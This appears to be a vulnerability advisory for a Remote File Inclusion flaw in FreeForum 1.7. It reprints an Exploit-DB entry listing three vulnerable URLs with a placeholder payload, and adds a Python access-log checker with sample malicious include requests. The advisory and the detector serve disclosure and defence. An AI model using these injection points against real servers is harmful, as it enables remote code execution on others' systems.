Vendor: FreeForum
By: indoushka
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Inclusion (RFI)
CWE: 98
Product Name: FreeForum
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: N/A
Related CWE: N/A
CPE: a:soft_zoneo:freeforum:1.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
Year: 2009

FreeForum 1.7 RFI Vulnerability

FreeForum 1.7 contains a Remote File Inclusion (RFI) vulnerability. The advisory lists the languagefile parameter of forum.php and the path parameter of export.php and latestpost.php. An attacker can exploit the flaw by sending a crafted HTTP request to the application, which can allow execution of arbitrary code on the affected system.

Mitigation:

The best way to mitigate RFI attacks is to ensure that user input is properly sanitized and validated. Additionally, applications should be configured to use the least privilege necessary to perform their functions.

Exploit-DB raw data:

========================================================================================
| # Title    : FreeForum 1.7 RFI Vulnerability                                         |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   :                                                                         |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # Date     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : powered by FreeForum (FreeForum 1.7*http://soft.zoneo.net/freeForum/)   |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)       |
| # Bug      : RFI                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://localhost/freeforum-1.7/forum.php?languagefile=[EV!L]
|
| 2- http://localhost/freeforum-1.7/export.php?path=[EV!L]
|
| 3- http://localhost/freeforum-1.7/latestpost.php?path=[EV!L]
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------
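
A log check for the three script and parameter pairs listed in the advisory above, added here as an example; it is not part of the original advisory or of FreeForum. It assumes a combined-format web access log, and the function name, sample log lines, addresses and hosts are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> include parameter, as listed in the advisory.
WATCHED = {"forum.php": "languagefile", "export.php": "path", "latestpost.php": "path"}

# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Decoded value that starts with scheme:// or a protocol-relative //host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Dec/2009:10:00:01 +0000] "GET /freeforum-1.7/forum.php?languagefile=lang/english.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Dec/2009:10:00:07 +0000] "GET /freeforum-1.7/forum.php?languagefile=http%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [16/Dec/2009:10:00:09 +0000] "GET /freeforum-1.7/export.php?path=ftp://remote.example/x HTTP/1.1" 200 88',
    '192.0.2.10 - - [16/Dec/2009:10:00:12 +0000] "GET /freeforum-1.7/latestpost.php?path=./ HTTP/1.1" 200 2048',
    '192.0.2.10 - - [16/Dec/2009:10:00:15 +0000] "GET /freeforum-1.7/index.php?path=http://remote.example/ HTTP/1.1" 404 0',
]


def remote_include_hits(lines):
    """Return (line_no, script, param, value) for each watched include
    parameter whose decoded value points at a remote location."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line we can parse
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue  # script is not one of the three in the advisory
        # parse_qs percent-decodes once, so http%3A%2F%2F... is caught too.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if REMOTE.match(value):
                hits.append((line_no, script, param, value))
    return hits


if __name__ == "__main__":
    for hit in remote_include_hits(SAMPLE_LOG):
        print(hit)
```

Values are percent-decoded only once; logs that may contain double-encoded values need a second decoding pass before matching.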